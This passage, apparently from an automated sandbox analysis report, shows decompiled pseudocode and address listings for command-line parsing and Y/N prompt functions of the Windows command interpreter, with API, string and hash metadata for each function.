									_t184 = E011DF9D5(_t175) & 0x0000ffff;
									if(_t184 == 0) {
										goto L15;
									}
									if(_t184 != 0xa) {
										goto L41;
									} else {
										_t184 = E011DF9D5(_t175) & 0x0000ffff;
										if(_t184 != 0) {
											goto L41;
										} else {
											goto L15;
										}
									}
								}
								goto L140;
							} else {
								L34:
								if(_t184 == 0x22) {
									_t169 = _t169 ^ 0x00000002;
									_a4 = _t169;
								}
								if((_t169 & 0x00000023) == 0) {
									_t155 = iswspace(_t184);
									_t189 = _t189 + 4;
									if(_t155 != 0) {
										goto L15;
									}
									if((_t169 & 0x00000004) != 0) {
										_t156 = 0x11d2102;
									} else {
										_t156 = L"=,;";
									}
									_t157 = wcschr(_t156, _t184);
									_t189 = _t189 + 8;
									if(_t157 != 0) {
										goto L15;
									}
								}
								_t130 = iswdigit(_t184);
								_t189 = _t189 + 4;
								if(_t130 != 0) {
									_t175 =  *0x120b8a4;
									if((_t175 - 0x120388e & 0xfffffffe) < 4) {
										L88:
										_t135 =  *_t175 & 0x0000ffff;
										if(_t135 != 0x3e) {
											if(_t135 != 0x3c) {
												goto L41;
											} else {
												goto L89;
											}
										} else {
											L89:
											if((_t169 & 0x00000022) == 0) {
												goto L15;
											}
											goto L41;
										}
									} else {
										_t152 =  *(_t175 - 4) & 0x0000ffff;
										_v20 = _t152;
										_t153 = iswspace(_t152);
										_t189 = _t189 + 4;
										if(_t153 == 0) {
											_t175 = L"()|&=,;\"";
											if(E011DD7D4(L"()|&=,;\"", _v20) == 0) {
												goto L41;
											} else {
												goto L87;
											}
										} else {
											L87:
											_t175 =  *0x120b8a4;
											goto L88;
										}
									}
									goto L140;
								}
							}
						}
					}
					L41:
					 *_t180 = _t184;
					_t181 =  &(_t180[0]);
					_a4 = _t169 | 0x00000040;
					 *0x11fd548 = 0;
					_t173 = _t181 - _v16 >> 1;
					while(1) {
						_v8 = _t181;
						_t185 = E011DF9D5(_t175) & 0x0000ffff;
						if( *0x11fd5b4 != 0) {
							goto L131;
						}
						L43:
						_t109 = _t185 & 0x0000ffff;
						if(_t109 < 0x41 || _t109 >= 0x7c) {
							if(_t109 > 0x7c) {
								goto L45;
							} else {
								_t34 = _t109 + 0x11df958; // 0x5050500
								switch( *((intOrPtr*)(( *_t34 & 0x000000ff) * 4 +  &M011DF940))) {
									case 0:
										_t127 = _a4;
										goto L54;
									case 1:
										__eax = _a4;
										goto L55;
									case 2:
										__eax = _a4;
										goto L114;
									case 3:
										L101:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if((__al & 0x00000010) != 0) {
												L54:
												_t102 = _t127 & 0xffffffdd;
												_a4 = _t102;
												L55:
												if((_t102 & 0x00000022) != 0) {
													goto L45;
												}
												goto L62;
											} else {
												if(__si == 0x29) {
													goto L45;
												} else {
													goto L54;
												}
											}
										}
										goto L140;
									case 4:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if( *0x11fd548 == 0) {
												goto L49;
											} else {
												L114:
												__al = __al & 0x0000002a;
												if(__al != 8) {
													goto L45;
												} else {
													goto L101;
												}
											}
										}
										goto L140;
									case 5:
										goto L45;
								}
							}
						} else {
							L45:
							_t110 = _a4;
							if(_t185 == 0x5e) {
								if((_t110 & 0x00000022) != 0) {
									goto L46;
								} else {
									_t185 = E011DF9D5(_t175) & 0x0000ffff;
									if(_t185 == 0) {
										goto L61;
									} else {
										if(_t185 != 0xa) {
											goto L49;
										} else {
											_t185 = E011DF9D5(_t175) & 0x0000ffff;
											if(_t185 == 0) {
												goto L61;
											} else {
												goto L49;
											}
										}
									}
								}
								goto L140;
							} else {
								L46:
								if(_t185 == 0x22) {
									_t110 = _t110 ^ 0x00000002;
									_a4 = _t110;
								}
								if((_t110 & 0x00000023) == 0) {
									_t111 = iswspace(_t185);
									_t189 = _t189 + 4;
									if(_t111 != 0) {
										goto L61;
									} else {
										if((_a4 & 0x00000004) != 0) {
											_t112 = 0x11d2102;
										} else {
											_t112 = L"=,;";
										}
										_t113 = wcschr(_t112, _t185);
										_t189 = _t189 + 8;
										if(_t113 == 0) {
											goto L48;
										} else {
											goto L61;
										}
									}
								} else {
									L48:
									_t114 = iswdigit(_t185);
									_t189 = _t189 + 4;
									if(_t114 != 0) {
										_t175 =  *0x120b8a4;
										if((_t175 - 0x120388e & 0xfffffffe) < 4) {
											L70:
											_t120 =  *( *0x120b8a4) & 0x0000ffff;
											if(_t120 == 0x3e || _t120 == 0x3c) {
												_t102 = _a4;
												if((_t102 & 0x00000022) == 0) {
													goto L62;
												} else {
													goto L49;
												}
											} else {
												goto L49;
											}
										} else {
											_t121 =  *(_t175 - 4) & 0x0000ffff;
											_v20 = _t121;
											_t122 = iswspace(_t121);
											_t189 = _t189 + 4;
											if(_t122 != 0) {
												goto L70;
											} else {
												_t123 = wcschr(L"()|&=,;\"", _v20);
												_t189 = _t189 + 8;
												if(_t123 == 0) {
													goto L49;
												} else {
													goto L70;
												}
											}
										}
										goto L140;
									} else {
										L49:
										if(_t173 >= _v12 - 1) {
											L61:
											_t102 = _a4;
										} else {
											 *_t181 = _t185;
											_t181 =  &(_t181[0]);
											_t173 = _t173 + 1;
											continue;
										}
									}
								}
							}
						}
						L62:
						_a4 = _t102 & 0xffffffbf;
						 *_t181 = 0;
						_t182 = _v12;
						_t47 = _t182 - 1; // 0x3
						if(_t173 < _t47) {
							_t175 =  *0x120b8a4;
							if( *0x120b8a4 != 0x1203890) {
								 *0x120b8a4 =  *0x120b8a4 - 2;
							}
						}
						if(_t173 >= _t182) {
							if(_t185 != 0xffff) {
								_t92 = E011DC5A2(_t175, 0x234f, 1, _v16);
								goto L139;
							}
						}
						return 0x4000;
						goto L140;
						L131:
						 *0x11fd5b4 = 0;
						if((_a4 & 0x00000040) != 0) {
							goto L49;
						} else {
							_t185 = E011DF9D5(_t175) & 0x0000ffff;
							goto L43;
						}
						goto L140;
					}
				}
				goto L140;
			}

















































                                                    0x011df300
                                                    0x011df300
                                                    0x011df30b
                                                    0x011df30d
                                                    0x011df312
                                                    0x011df315
                                                    0x011df318
                                                    0x011df31d
                                                    0x011df322
                                                    0x011ec593
                                                    0x00000000
                                                    0x011ec593
                                                    0x011df328
                                                    0x011df32d
                                                    0x011df432
                                                    0x011ec4dc
                                                    0x011ec4e7
                                                    0x011ec4ec
                                                    0x011df43d
                                                    0x011df44a
                                                    0x011df333
                                                    0x011df337
                                                    0x00000000
                                                    0x00000000
                                                    0x011df33d
                                                    0x011df345
                                                    0x011df34a
                                                    0x011df350
                                                    0x011df352
                                                    0x011df357
                                                    0x011df35b
                                                    0x011df361
                                                    0x011df366
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df352
                                                    0x011df357
                                                    0x011df35b
                                                    0x011df361
                                                    0x011df364
                                                    0x011df36d
                                                    0x011df370
                                                    0x011df744
                                                    0x011df376
                                                    0x011df376
                                                    0x011df376
                                                    0x011df37d
                                                    0x011df383
                                                    0x011df388
                                                    0x011df6de
                                                    0x00000000
                                                    0x011df6e4
                                                    0x00000000
                                                    0x011df6e4
                                                    0x011df6de
                                                    0x011df38e
                                                    0x011df38e
                                                    0x011df398
                                                    0x011df39d
                                                    0x011df39d
                                                    0x00000000
                                                    0x011df398
                                                    0x011df352
                                                    0x011df3a2
                                                    0x011df3ae
                                                    0x011df3b1
                                                    0x011ec4f4
                                                    0x011ec501
                                                    0x00000000
                                                    0x011ec507
                                                    0x011ec50c
                                                    0x00000000
                                                    0x011ec50c
                                                    0x00000000
                                                    0x011df3b7
                                                    0x011df3b7
                                                    0x011df3b7
                                                    0x011df3bd
                                                    0x011df450
                                                    0x011df48a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df452
                                                    0x011df452
                                                    0x011df455
                                                    0x00000000
                                                    0x011df457
                                                    0x011df457
                                                    0x011df45e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df465
                                                    0x011df46b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df46d
                                                    0x011df470
                                                    0x011df475
                                                    0x00000000
                                                    0x00000000
                                                    0x011df485
                                                    0x011df475
                                                    0x00000000
                                                    0x00000000
                                                    0x011df7bb
                                                    0x00000000
                                                    0x011df7c1
                                                    0x011df7c8
                                                    0x00000000
                                                    0x011df7ce
                                                    0x00000000
                                                    0x011df7ce
                                                    0x011df7c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df45e
                                                    0x011df455
                                                    0x011df3c3
                                                    0x011df3c3
                                                    0x011df3c3
                                                    0x011df3c6
                                                    0x011df3c9
                                                    0x011df3cc
                                                    0x011df3d2
                                                    0x011df3d2
                                                    0x011df3d5
                                                    0x011df3d9
                                                    0x011df3dc
                                                    0x011df3de
                                                    0x011df3e4
                                                    0x011df3e9
                                                    0x011df76d
                                                    0x011df770
                                                    0x011df773
                                                    0x011df776
                                                    0x011df778
                                                    0x011df778
                                                    0x011df3f3
                                                    0x011df681
                                                    0x011df688
                                                    0x011df6c6
                                                    0x011df6c9
                                                    0x011df6cc
                                                    0x011df6d4
                                                    0x011df6d7
                                                    0x011df6d7
                                                    0x011df68a
                                                    0x011df691
                                                    0x011df739
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df697
                                                    0x011df697
                                                    0x011df69b
                                                    0x011df7d8
                                                    0x011df7db
                                                    0x011df7de
                                                    0x011df7de
                                                    0x011df7e1
                                                    0x011df7e1
                                                    0x011df7e1
                                                    0x011df7e6
                                                    0x011df7ea
                                                    0x011df7f0
                                                    0x011df7f3
                                                    0x011df7f9
                                                    0x011df803
                                                    0x011df813
                                                    0x011df819
                                                    0x011df81c
                                                    0x011df81f
                                                    0x011df822
                                                    0x011df822
                                                    0x011df813
                                                    0x011df6a1
                                                    0x011df6a1
                                                    0x011df6ab
                                                    0x011df6b4
                                                    0x011df6b4
                                                    0x00000000
                                                    0x011df6ab
                                                    0x011df417
                                                    0x011df417
                                                    0x011df419
                                                    0x00000000
                                                    0x011df41f
                                                    0x011df3f3
                                                    0x011df48c
                                                    0x011df490
                                                    0x011df868
                                                    0x00000000
                                                    0x011df86e
                                                    0x011df873
                                                    0x011df879
                                                    0x00000000
                                                    0x00000000
                                                    0x011df882
                                                    0x00000000
                                                    0x011df888
                                                    0x011ec519
                                                    0x011ec51f
                                                    0x00000000
                                                    0x011ec525
                                                    0x00000000
                                                    0x011ec525
                                                    0x011ec51f
                                                    0x011df882
                                                    0x00000000
                                                    0x011df496
                                                    0x011df496
                                                    0x011df49a
                                                    0x011df780
                                                    0x011df783
                                                    0x011df783
                                                    0x011df4a3
                                                    0x011df4a6
                                                    0x011df4ac
                                                    0x011df4b1
                                                    0x00000000
                                                    0x00000000
                                                    0x011df4ba
                                                    0x011df74e
                                                    0x011df4c0
                                                    0x011df4c0
                                                    0x011df4c0
                                                    0x011df4c7
                                                    0x011df4cd
                                                    0x011df4d2
                                                    0x00000000
                                                    0x00000000
                                                    0x011df4d2
                                                    0x011df4d9
                                                    0x011df4df
                                                    0x011df4e4
                                                    0x011df6e9
                                                    0x011df6ff
                                                    0x011df720
                                                    0x011df720
                                                    0x011df726
                                                    0x011df78e
                                                    0x00000000
                                                    0x011df794
                                                    0x00000000
                                                    0x011df794
                                                    0x011df728
                                                    0x011df728
                                                    0x011df72b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df731
                                                    0x011df701
                                                    0x011df701
                                                    0x011df706
                                                    0x011df709
                                                    0x011df70f
                                                    0x011df714
                                                    0x011df890
                                                    0x011df89c
                                                    0x00000000
                                                    0x011df8a2
                                                    0x00000000
                                                    0x011df8a2
                                                    0x011df71a
                                                    0x011df71a
                                                    0x011df71a
                                                    0x00000000
                                                    0x011df71a
                                                    0x011df714
                                                    0x00000000
                                                    0x011df6ff
                                                    0x011df4e4
                                                    0x011df490
                                                    0x011df3bd
                                                    0x011df4ea
                                                    0x011df4ed
                                                    0x011df4f0
                                                    0x011df4f3
                                                    0x011df4f8
                                                    0x011df505
                                                    0x011df507
                                                    0x011df507
                                                    0x011df516
                                                    0x011df519
                                                    0x00000000
                                                    0x00000000
                                                    0x011df51f
                                                    0x011df51f
                                                    0x011df525
                                                    0x011df56d
                                                    0x00000000
                                                    0x011df56f
                                                    0x011df56f
                                                    0x011df576
                                                    0x00000000
                                                    0x011df57d
                                                    0x00000000
                                                    0x00000000
                                                    0x011df6be
                                                    0x00000000
                                                    0x00000000
                                                    0x011df82c
                                                    0x00000000
                                                    0x00000000
                                                    0x011df796
                                                    0x011df796
                                                    0x011df79b
                                                    0x00000000
                                                    0x011df7a1
                                                    0x011df7a3
                                                    0x011df580
                                                    0x011df580
                                                    0x011df583
                                                    0x011df586
                                                    0x011df588
                                                    0x00000000
                                                    0x011df58a
                                                    0x00000000
                                                    0x011df7a9
                                                    0x011df7ad
                                                    0x00000000
                                                    0x011df7b3
                                                    0x00000000
                                                    0x011df7b3
                                                    0x011df7ad
                                                    0x011df7a3
                                                    0x00000000
                                                    0x00000000
                                                    0x011df758
                                                    0x011df75d
                                                    0x00000000
                                                    0x011df763
                                                    0x011ec552
                                                    0x00000000
                                                    0x011ec558
                                                    0x011df82f
                                                    0x011df82f
                                                    0x011df833
                                                    0x00000000
                                                    0x011df839
                                                    0x00000000
                                                    0x011df839
                                                    0x011df833
                                                    0x011ec552
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df576
                                                    0x011df52c
                                                    0x011df52c
                                                    0x011df52c
                                                    0x011df533
                                                    0x011df840
                                                    0x00000000
                                                    0x011df846
                                                    0x011df84b
                                                    0x011df851
                                                    0x00000000
                                                    0x011df857
                                                    0x011df85a
                                                    0x00000000
                                                    0x011df860
                                                    0x011ec562
                                                    0x011ec568
                                                    0x00000000
                                                    0x011ec56e
                                                    0x00000000
                                                    0x011ec56e
                                                    0x011ec568
                                                    0x011df85a
                                                    0x011df851
                                                    0x00000000
                                                    0x011df539
                                                    0x011df539
                                                    0x011df53d
                                                    0x011df671
                                                    0x011df674
                                                    0x011df674
                                                    0x011df545
                                                    0x011df58d
                                                    0x011df593
                                                    0x011df598
                                                    0x00000000
                                                    0x011df59a
                                                    0x011df59e
                                                    0x011df667
                                                    0x011df5a4
                                                    0x011df5a4
                                                    0x011df5a4
                                                    0x011df5ab
                                                    0x011df5b1
                                                    0x011df5b6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df5b6
                                                    0x011df547
                                                    0x011df547
                                                    0x011df548
                                                    0x011df54e
                                                    0x011df553
                                                    0x011df5fb
                                                    0x011df611
                                                    0x011df641
                                                    0x011df646
                                                    0x011df64c
                                                    0x011df657
                                                    0x011df65c
                                                    0x00000000
                                                    0x011df662
                                                    0x00000000
                                                    0x011df662
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df613
                                                    0x011df613
                                                    0x011df618
                                                    0x011df61b
                                                    0x011df621
                                                    0x011df626
                                                    0x00000000
                                                    0x011df628
                                                    0x011df630
                                                    0x011df636
                                                    0x011df63b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011df63b
                                                    0x011df626
                                                    0x00000000
                                                    0x011df559
                                                    0x011df559
                                                    0x011df55f
                                                    0x011df5b8
                                                    0x011df5b8
                                                    0x011df561
                                                    0x011df561
                                                    0x011df564
                                                    0x011df567
                                                    0x00000000
                                                    0x011df567
                                                    0x011df55f
                                                    0x011df553
                                                    0x011df545
                                                    0x011df533
                                                    0x011df5bb
                                                    0x011df5be
                                                    0x011df5c3
                                                    0x011df5c6
                                                    0x011df5c9
                                                    0x011df5ce
                                                    0x011df5d0
                                                    0x011df5dc
                                                    0x011df5de
                                                    0x011df5de
                                                    0x011df5dc
                                                    0x011df5e7
                                                    0x011ec57b
                                                    0x011ec58b
                                                    0x00000000
                                                    0x011ec590
                                                    0x011ec57b
                                                    0x011df5f8
                                                    0x00000000
                                                    0x011ec52a
                                                    0x011ec52e
                                                    0x011ec538
                                                    0x00000000
                                                    0x011ec53e
                                                    0x011ec543
                                                    0x00000000
                                                    0x011ec543
                                                    0x00000000
                                                    0x011ec538
                                                    0x011df507
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: iswspace$wcschr$iswdigit$_setjmp3
                                                    • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                    • API String ID: 1805751789-2755026540
                                                    • Opcode ID: d25baac2e000737c5fe1537f19ac4be1d87a99457f72269128c39179d34e263a
                                                    • Instruction ID: 3b2e26927944b91f88d64370b0b0d0722f7b0f0ba93f8f8ff0ccbb8749d1bbe7
                                                    • Opcode Fuzzy Hash: d25baac2e000737c5fe1537f19ac4be1d87a99457f72269128c39179d34e263a
                                                    • Instruction Fuzzy Hash: F4E10675A00213AADF3D8F6DA94C3BA3BA0AF05258F594126ED47D7292E734C783C752
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F9583, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 247COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E011F9583(void* __ecx, intOrPtr __edx, char _a4) {
				signed int _v12;
				long _v44;
				char _v45;
				char _v46;
				long _v52;
				long _v56;
				long _v60;
				long _v64;
				intOrPtr _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				intOrPtr _t58;
				void* _t69;
				signed int _t74;
				void* _t81;
				signed int _t93;
				void _t94;
				signed int _t98;
				char _t100;
				void* _t101;
				signed int* _t105;
				intOrPtr* _t106;
				void* _t114;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				long _t128;
				void* _t130;
				wchar_t* _t131;
				long _t134;
				signed int _t135;
				void* _t136;
				void* _t137;
				void* _t138;

				_t104 = __ecx;
				_t51 =  *0x11fd0b4; // 0x1805bc26
				_v12 = _t51 ^ _t135;
				_t100 = _a4;
				_t128 = 0;
				_v68 = __edx;
				_v72 = __ecx;
				_v56 = 0;
				_v45 = 0;
				_v46 = 0;
				if(__edx != 0x400023d3) {
					L5:
					_push(_t100);
					_t124 = E011DB3FC(_t104);
					_t137 = _t136 + 4;
					if(_t124 == 0) {
						L10:
						_t105 =  &_v44;
						_t120 = 0x10;
						_t130 = L"NY" - _t105;
						while(1) {
							_t12 = _t120 + 0x7fffffee; // 0x7ffffffe
							if(_t12 == 0) {
								break;
							}
							_t93 =  *(_t130 + _t105) & 0x0000ffff;
							if(_t93 == 0) {
								break;
							}
							 *_t105 = _t93;
							_t105 =  &(_t105[0]);
							_t120 = _t120 - 1;
							if(_t120 != 0) {
								continue;
							}
							L16:
							_t105 = _t105 - 2;
							L17:
							_t128 = 0;
							 *_t105 = 0;
							L18:
							_t106 =  &_v44;
							_t121 = _t106 + 2;
							do {
								_t58 =  *_t106;
								_t106 = _t106 + 2;
							} while (_t58 != 0);
							_t108 = _t106 - _t121 >> 1;
							_v80 = (_t106 - _t121 >> 1) - 1;
							LocalFree(_t124);
							_t101 = GetStdHandle(0xfffffff5);
							_v88 = _t101;
							if(GetConsoleMode(_t101,  &_v60) != 0) {
								_t108 = _v60 | 0x00000001;
								_v45 = 1;
								SetConsoleMode(_t101, _v60 | 0x00000001);
							}
							_t125 = GetStdHandle(0xfffffff6);
							_v84 = _t125;
							if(GetConsoleMode(_t125,  &_v64) != 0) {
								_t108 = _v64 | 0x00000007;
								SetConsoleMode(_t125, _v64 | 0x00000007);
								_t134 =  *0x1203888;
								if(_t134 != 0) {
									_t108 = _t134;
									 *0x12194b4(L"<noalias>");
									 *_t134();
								}
								_t128 = 0;
							}
							_t126 = _v68;
							while(1) {
								_t100 = 1;
								_v52 = 0;
								_t68 = _v72;
								if(_v72 == 0) {
									_push(0);
									_push(_t126);
									_t69 = E011DC108(_t108);
									_t138 = _t137 + 8;
								} else {
									_t69 = E011DC108(_t108, _t126, 1, _t68);
									_t138 = _t137 + 0xc;
								}
								_t108 = 0;
								if(E011E0178(_t69) != 0) {
									FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
								}
								if(_v52 == 0xa) {
									goto L45;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t81 = GetStdHandle(0xfffffff6);
									_t121 =  &_v52;
									_t108 = _t81;
									if(E011F3B11(_t81,  &_v52, 1,  &_v76) == 0 || _v76 != 1) {
										break;
									}
									if(_t100 != 0) {
										_t128 = towupper(_v52) & 0x0000ffff;
										_t138 = _t138 + 4;
										_v56 = _t128;
									}
									_t108 = 0;
									_t100 = 0;
									if(E011E0178(_t82) == 0 || ( *0x1213aa0 & 0x00000001) == 0) {
										_push(_v52 & 0x0000ffff);
										E011E25D9(L"%c");
										_t138 = _t138 + 8;
									}
									if(_v52 != 0xa) {
										continue;
									} else {
										goto L45;
									}
								}
								_t128 = _v44 & 0x0000ffff;
								_v56 = _t128;
								E011E25D9(L"\r\n");
								_t138 = _t138 + 4;
								L45:
								_t131 = wcschr( &_v44, _t128);
								_t137 = _t138 + 8;
								if(_t131 == 0) {
									L28:
									_t128 = _v56;
									continue;
								}
								_t133 = _t131 -  &_v44 >> 1;
								if(_t133 > _v80) {
									goto L28;
								}
								_t127 = _v84;
								if(_v45 != 0) {
									SetConsoleMode(_v88, _v60);
								}
								if(_t100 != 0) {
									SetConsoleMode(_t127, _v64);
									_t127 =  *0x1203888;
									if(_t127 != 0) {
										 *0x12194b4(L"CMD.EXE");
										 *_t127();
									}
								}
								_t74 = _t133;
								L53:
								return E011E6FD0(_t74, _t100, _v12 ^ _t135, _t121, _t127, _t133);
							}
						}
						if(_t120 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t114 = _t124;
					_t8 = _t114 + 2; // 0x2
					_t122 = _t8;
					do {
						_t94 =  *_t114;
						_t114 = _t114 + 2;
					} while (_t94 != 0);
					if(_t114 - _t122 >> 1 >= 0x10) {
						goto L10;
					}
					E011E1040( &_v44, 0x10, _t124);
					__imp___wcsupr( &_v44);
					_t137 = _t137 + 4;
					goto L18;
				}
				_t136 = _t136 - 8;
				_t121 = 0;
				_t127 = E011D5DB5(__ecx, 0);
				if(_t127 == 0xffffffff) {
					goto L5;
				}
				_t98 = E011E0178(_t97);
				_t104 = _t127;
				_t133 = _t98;
				E011DDB92(_t127);
				if(_t98 == 0) {
					_t128 = 0;
					goto L5;
				}
				_t74 = 2;
				goto L53;
			}















































                                                    0x011f9583
                                                    0x011f958b
                                                    0x011f9592
                                                    0x011f9596
                                                    0x011f959c
                                                    0x011f959e
                                                    0x011f95a1
                                                    0x011f95a4
                                                    0x011f95a7
                                                    0x011f95ab
                                                    0x011f95b6
                                                    0x011f95e9
                                                    0x011f95e9
                                                    0x011f95ef
                                                    0x011f95f1
                                                    0x011f95f6
                                                    0x011f9634
                                                    0x011f9634
                                                    0x011f963e
                                                    0x011f9643
                                                    0x011f9645
                                                    0x011f9645
                                                    0x011f964d
                                                    0x00000000
                                                    0x00000000
                                                    0x011f964f
                                                    0x011f9656
                                                    0x00000000
                                                    0x00000000
                                                    0x011f9658
                                                    0x011f965b
                                                    0x011f965e
                                                    0x011f9661
                                                    0x00000000
                                                    0x00000000
                                                    0x011f9669
                                                    0x011f9669
                                                    0x011f966c
                                                    0x011f966e
                                                    0x011f9670
                                                    0x011f9673
                                                    0x011f9673
                                                    0x011f9676
                                                    0x011f9679
                                                    0x011f9679
                                                    0x011f967c
                                                    0x011f967f
                                                    0x011f9686
                                                    0x011f968c
                                                    0x011f968f
                                                    0x011f969d
                                                    0x011f96a4
                                                    0x011f96af
                                                    0x011f96b4
                                                    0x011f96b7
                                                    0x011f96bd
                                                    0x011f96bd
                                                    0x011f96cb
                                                    0x011f96d2
                                                    0x011f96dd
                                                    0x011f96e4
                                                    0x011f96e9
                                                    0x011f96ef
                                                    0x011f96f7
                                                    0x011f96fe
                                                    0x011f9700
                                                    0x011f9706
                                                    0x011f9706
                                                    0x011f9708
                                                    0x011f9708
                                                    0x011f970f
                                                    0x011f9717
                                                    0x011f9719
                                                    0x011f971b
                                                    0x011f971f
                                                    0x011f9724
                                                    0x011f9734
                                                    0x011f9736
                                                    0x011f9737
                                                    0x011f973c
                                                    0x011f9726
                                                    0x011f972a
                                                    0x011f972f
                                                    0x011f972f
                                                    0x011f973f
                                                    0x011f9748
                                                    0x011f9753
                                                    0x011f9753
                                                    0x011f975e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f9764
                                                    0x011f9764
                                                    0x011f976c
                                                    0x011f9772
                                                    0x011f9775
                                                    0x011f977e
                                                    0x00000000
                                                    0x00000000
                                                    0x011f9788
                                                    0x011f9793
                                                    0x011f9796
                                                    0x011f9799
                                                    0x011f9799
                                                    0x011f979c
                                                    0x011f979e
                                                    0x011f97a7
                                                    0x011f97b6
                                                    0x011f97bc
                                                    0x011f97c1
                                                    0x011f97c1
                                                    0x011f97c9
                                                    0x00000000
                                                    0x011f97cb
                                                    0x00000000
                                                    0x011f97cb
                                                    0x011f97c9
                                                    0x011f97cd
                                                    0x011f97d6
                                                    0x011f97d9
                                                    0x011f97de
                                                    0x011f97e1
                                                    0x011f97ec
                                                    0x011f97ee
                                                    0x011f97f3
                                                    0x011f9714
                                                    0x011f9714
                                                    0x00000000
                                                    0x011f9714
                                                    0x011f97fe
                                                    0x011f9803
                                                    0x00000000
                                                    0x00000000
                                                    0x011f980d
                                                    0x011f9810
                                                    0x011f9818
                                                    0x011f9818
                                                    0x011f9820
                                                    0x011f9826
                                                    0x011f982c
                                                    0x011f9834
                                                    0x011f983d
                                                    0x011f9843
                                                    0x011f9843
                                                    0x011f9834
                                                    0x011f9845
                                                    0x011f9847
                                                    0x011f9857
                                                    0x011f9857
                                                    0x011f9717
                                                    0x011f9667
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f9667
                                                    0x011f95f8
                                                    0x011f95fa
                                                    0x011f95fa
                                                    0x011f9603
                                                    0x011f9603
                                                    0x011f9606
                                                    0x011f9609
                                                    0x011f9615
                                                    0x00000000
                                                    0x00000000
                                                    0x011f9620
                                                    0x011f9629
                                                    0x011f962f
                                                    0x00000000
                                                    0x011f962f
                                                    0x011f95b8
                                                    0x011f95bb
                                                    0x011f95c2
                                                    0x011f95c7
                                                    0x00000000
                                                    0x00000000
                                                    0x011f95cb
                                                    0x011f95d0
                                                    0x011f95d2
                                                    0x011f95d4
                                                    0x011f95db
                                                    0x011f95e7
                                                    0x00000000
                                                    0x011f95e7
                                                    0x011f95dd
                                                    0x00000000

                                                    APIs
                                                    • _wcsupr.MSVCRT ref: 011F9629
                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 011F968F
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F9697
                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96A7
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96BD
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F96C5
                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96D5
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F96E9
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F974C
                                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 011F9753
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 011F976C
                                                    • towupper.MSVCRT ref: 011F978D
                                                    • wcschr.MSVCRT ref: 011F97E6
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F9818
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F9826
                                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                    • String ID: <noalias>$CMD.EXE
                                                    • API String ID: 2015057810-1690691951
                                                    • Opcode ID: 9ebae59d47204f767e2cc653ff14754d2f9e49e39fdf8f7df4d46377846410a5
